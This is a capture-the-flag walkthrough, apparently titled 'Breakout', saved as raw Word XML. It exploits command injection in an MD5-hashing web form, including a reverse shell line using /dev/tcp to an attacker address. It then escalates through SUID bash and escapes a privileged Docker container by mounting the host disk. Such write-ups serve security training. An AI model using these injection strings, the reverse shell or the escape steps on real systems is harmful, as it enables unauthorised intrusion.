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Breakout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4"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9okpat82myy0" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>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determine the running services and identify accessible ports. To accomplish this task, we will use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 a tool specialized in network mapping and service analysis.</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68500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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completing the execution of the tool, we identified two open ports, 22 and 80. Now, we will direct our attention to the web service on port 80.</w:t>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28900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Upon accessing the application, it is possible to notice that we need to insert a string and send it to the web server so that the corresponding MD5 hash of that character sequence is generated and displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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Considering that the application is processing the input and generating an MD5 hash, it is possible to infer that this process is being performed using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">md5sum</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility. This approach may represent a potential command injection point, depending on how the application is implementing this functionality and whether it is properly sanitizing our input. Let’s conduct some tests to evaluate the behavior of the application. First, we will insert the string </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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22500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Now we will insert </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">123; echo teste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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87600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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By noticing the consistency in hash values when preceded by the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can infer that the application is executing an operation similar to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo &lt;your string here&gt; | md5sum.</w:t>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this information, it becomes possible to insert commands to be processed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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;id;123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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86000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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obtained the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Now, we will proceed by inserting a reverse shell payload to gain access to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1';123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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1E">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184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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payload, we received the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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l1nshfpoidc1"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1930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4bdp6yuqoypp" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the simple shell to fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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2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 fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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retrieve our first flag, which is located in the root directory</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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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the first flag, we will begin server enumeration to search for privilege escalation opportunities, starting with identifying binaries with the SUID bit set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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find / -perm /4000 2&gt;/dev/null</w:t>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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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identified the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set. By executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it will run with the permissions of the binary owner, which in this case is the root user. This provides us with a root-privileged shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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c850u2pxa5xe" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Escape</w:t>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we are operating inside a container, we need to attempt escaping from it. For this purpose, we can use the following reference:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Confirming that we are inside a container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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59100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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nf1oy91sfj88" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape mounting the disk in the container:</w:t>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a misconfigured Docker setup where the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged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option is specified, it is possible to gain privileges to view/mount the host’s main disk inside our container.</w:t>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41500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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Thus, we can proceed with mounting the disk inside our container:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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Oops, we were not able to mount the partition even while being root. Why? If you notice, we are running with an effective user ID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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">euid=0</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which limits the execution of certain commands. To bypass this, we can set our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to zero, which is the UID of the root user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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python3 -c "import os; os.setuid(0); os.system('/bin/bash')"</w:t>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943600" cy="1765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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executing the mount command again, we successfully mounted the partition, obtaining our final flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:jc w:val="both"/>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930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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943600" cy="1930400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId25" w:type="default"/>
      <w:headerReference r:id="rId26" w:type="first"/>
      <w:headerReference r:id="rId27" w:type="even"/>
      <w:footerReference r:id="rId28" w:type="default"/>
      <w:footerReference r:id="rId29" w:type="first"/>
      <w:footerReference r:id="rId30"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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>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1" name="image1.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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40">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41">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5.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8" name="image4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4.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Breakout</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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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1.xml"/><Relationship Id="rId27"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2.xm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6.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation" TargetMode="External"/><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9.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f90Tw6LpqEpmWgCj9ITHB+u8EQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjlva3BhdDgybXl5MDIOaC5sMW5zaGZwb2lkYzEyDmguNGJkcDZ5dXFveXBwMg5oLmM4NTB1MnB4YTV4ZTIOaC5uZjFveTkxc2ZqODgyDmguMTc1ZjVjczk0ejBvOAByITFjdlNCYmREem56eVVGeTJjMkM0WFNuQU90RVJEMERhXw==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